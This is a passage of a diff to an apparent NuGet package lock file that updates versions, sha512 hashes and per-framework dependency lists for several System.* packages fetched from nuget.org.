[], "net452": [], "net46": [], "net461": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Net.Primitives", "id": "System.Net.Primitives", "version": "4.3.1", "sha512": "sha512-BgdlyYCI7rrdh36p3lMTqbkvaafPETpB1bk9iQlFdQxYE692kiXvmseXs8ghL+gEgQF2xgDc8GH4QLkSgUUs+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Numerics.Vectors", "id": "System.Numerics.Vectors", "version": "4.5.0", "sha512": "sha512-nATsBTD2CKr4AYN6eRszhX4sptImWmBJwB/U6XKCWWfnCcrTBw8XSCm3QA9gjppkHTr8OkXUY21MR91D3QZXsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Reflection.Metadata", "id": "System.Reflection.Metadata", "version": "8.0.0", "sha512": "sha512-+6sMdkJjee0B6nm3AlBBl7cQaI0oPniLvvkrkFhmEN3fo/hGONaFdwpAaO+GRTlbZe4kRZzFwU7kSXQW0RyJxg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Memory"], "net6.0": ["System.Collections.Immutable"], "net7.0": ["System.Collections.Immutable"], "net8.0": ["System.Collections.Immutable"], "net9.0": ["System.Collections.Immutable"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Reflection.MetadataLoadContext", "id": "System.Reflection.MetadataLoadContext", "version": "8.0.0", "sha512": "sha512-vfR5BfUXXy3amp5aDoOTwOt9BJ8CtplaAnEKHbeTbmMW1SJMrSdviTVVRNqDB0eB9o1j/26WD1VA8JGFfr8t+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net6.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net7.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Numerics.Vectors", "id": "System.Numerics.Vectors", "version": "4.6.0", "sha512": "sha512-dxZWbnnb21+5QuKAiUEntJirh5KiU1nqlLWtBu4v9/Fx1RnsgNn8T4XbmQhvCq/T94201P6EsGG2z2Y5ded1yA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Reflection.Metadata", "id": "System.Reflection.Metadata", "version": "9.0.0", "sha512": "sha512-jz+Y2m/CpdPvdjCNRigiWJYKFusdkfJlxDx4V5cWX2TubAMaz5CZpODBD/P2+20SpWvmZG6J3UYjl+R2Yg7yFw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Memory"], "net6.0": ["System.Collections.Immutable", "System.Memory"], "net7.0": ["System.Collections.Immutable", "System.Memory"], "net8.0": ["System.Collections.Immutable"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Reflection.MetadataLoadContext", "id": "System.Reflection.MetadataLoadContext", "version": "9.0.0", "sha512": "sha512-or1DAn2dl2SjxPA4tuDG9RxTxeERdHIU7gUJjNf8WhT6D08ZsHbmSZpP2rKpgGOXHMhmXf3CTDNmfa4cSD2DtA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net6.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net7.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net8.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime", "id": "System.Runtime", "version": "4.3.1", "sha512": "sha512-Al69mPDfzdD+bKGK2HAfB+lNFOHFqnkqzNnUJmmvUe1/qEPK9M7EiTT4zuycKDPy7ev11xz8XVgJWKP0hm7NIA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Runtime.CompilerServices.Unsafe", "id": "System.Runtime.CompilerServices.Unsafe", "version": "6.0.0", "sha512": "sha512-1AVzAb5OxJNvJLnOADtexNmWgattm2XVOT3TjQTN7Dd4SqoSwai1CsN2fth42uQldJSQdz/sAec0+TzxBFgisw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Runtime.CompilerServices.Unsafe", "id": "System.Runtime.CompilerServices.Unsafe", "version": "6.1.0", "sha512": "sha512-iY0upfdQeiaCfoxT+m4XJyb0IJNk4B9TLQFanOCOrU9X5x1x2TjKx0OFbLmg1VG2dOyL5nHMn198SBQ91Yy1kQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime.Handles", "id": "System.Runtime.Handles", "version": "4.3.0", "sha512": "sha512-CluvHdVUv54BvLTOCCyybugreDNk/rR8unMPruzXDtxSjvrQOU3M4R831/lQf4YI8VYp668FGQa/01E+Rq8PEQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Security.Cryptography.ProtectedData", "id": "System.Security.Cryptography.ProtectedData", "version": "8.0.0", "sha512": "sha512-hvcXZ/IR+KXxY9lC9S2izw5/fGYoODJR2r9kQSvs5v/HUAnBRuYYZPJrHzaT0CeDRJzIm8BHJb1ZrwHQ59j3uQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Memory"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory"], "netcoreapp2.1": ["System.Memory"], "netcoreapp2.2": ["System.Memory"], "netcoreapp3.0": ["System.Memory"], "netcoreapp3.1": ["System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory"], "netstandard2.1": ["System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Security.Cryptography.ProtectedData", "id": "System.Security.Cryptography.ProtectedData", "version": "9.0.0", "sha512": "sha512-Mbc5s1XBLje0N1idqILQUqWnG8RVj9p7uK110yxZXTzZq3CN7jaCFEySK52kA+dPYtByzcRtA/FUnK4o/sinSw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Memory"], "net6.0": ["System.Memory"], "net7.0": ["System.Memory"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory"], "netcoreapp2.1": ["System.Memory"], "netcoreapp2.2": ["System.Memory"], "netcoreapp3.0": ["System.Memory"], "netcoreapp3.1": ["System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory"], "netstandard2.1": ["System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Security.Principal", "id": "System.Security.Principal", "version": "4.3.0", "sha512": "sha512-24oe0NGJY32e+DFHVQzl2okM9uwYmn0Aa6nehqtVZ55/Al4Yva7S3BN934Kn5qATH7TVTUJkgxhisdfF7mKDfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime"], "net6.0": ["System.Runtime"], "net7.0": ["System.Runtime"], "net8.0": ["System.Runtime"], "net9.0": ["System.Runtime"], "netcoreapp1.0": ["System.Runtime"], "netcoreapp1.1": ["System.Runtime"], "netcoreapp2.0": ["System.Runtime"], "netcoreapp2.1": ["System.Runtime"], "netcoreapp2.2": ["System.Runtime"], "netcoreapp3.0": ["System.Runtime"], "netcoreapp3.1": ["System.Runtime"], "netstandard": [], "netstandard1.0": ["System.Runtime"], "netstandard1.1": ["System.Runtime"], "netstandard1.2": ["System.Runtime"], "netstandard1.3": ["System.Runtime"], "netstandard1.4": ["System.Runtime"], "netstandard1.5": ["System.Runtime"], "netstandard1.6": ["System.Runtime"], "netstandard2.0": ["System.Runtime"], "netstandard2.1": ["System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Text.Encoding", "id": "System.Text.Encoding", "version": "4.3.0", "sha512": "sha512-b/f+7HMTpxIfeV7H03bkuHKMFylCGfr9/U6gePnfFFW0aF8LOWLDgQCY6V1oWUqDksC3mdNuyChM1vy9TP4sZw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Text.Encoding.CodePages", "id": "System.Text.Encoding.CodePages", "version": "7.0.0", "sha512": "sha512-SFq/rrH52sMHJJsthDdafWPEuxdRCRB7pZ46trR2xSpi1nfKPAbw6amZr9W/LyHTlqS01TRWO7najRuO1vxFig==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Threading.Channels", "id": 